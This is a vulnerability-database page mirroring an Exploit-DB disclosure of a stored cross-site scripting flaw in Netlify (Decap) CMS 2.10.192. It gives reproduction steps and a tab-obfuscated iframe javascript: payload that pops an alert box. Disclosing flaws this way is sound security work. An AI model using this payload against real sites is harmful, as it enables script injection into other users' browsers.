Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbTmrswrrEDB-ID:51576
HistoryJul 11, 2023 - 12:00 a.m.

Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS)

2023-07-1100:00:00
tmrswrr
www.exploit-db.com
142
netlify cms
stored xss
cross-site scripting
decap cms
vulnerability
alert box
payload
security issue

AI Score

7.4

Confidence

Low

JSON
# Exploit Title: Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS)
# Exploit Author: tmrswrr
# Vendor Homepage: https://decapcms.org/docs/intro/
# Software Link: https://github.com/decaporg/decap-cms
# Version: 2.10.192
# Tested on: https://cms-demo.netlify.com


Description:

1. Go to new post and write body field your payload:

https://cms-demo.netlify.com/#/collections/posts

Payload = <iframe src=java&Tab;sc&Tab;ript:al&Tab;ert()></iframe>

2. After save it XSS payload will executed and see alert box

AI Score

7.4

Confidence

Low

JSON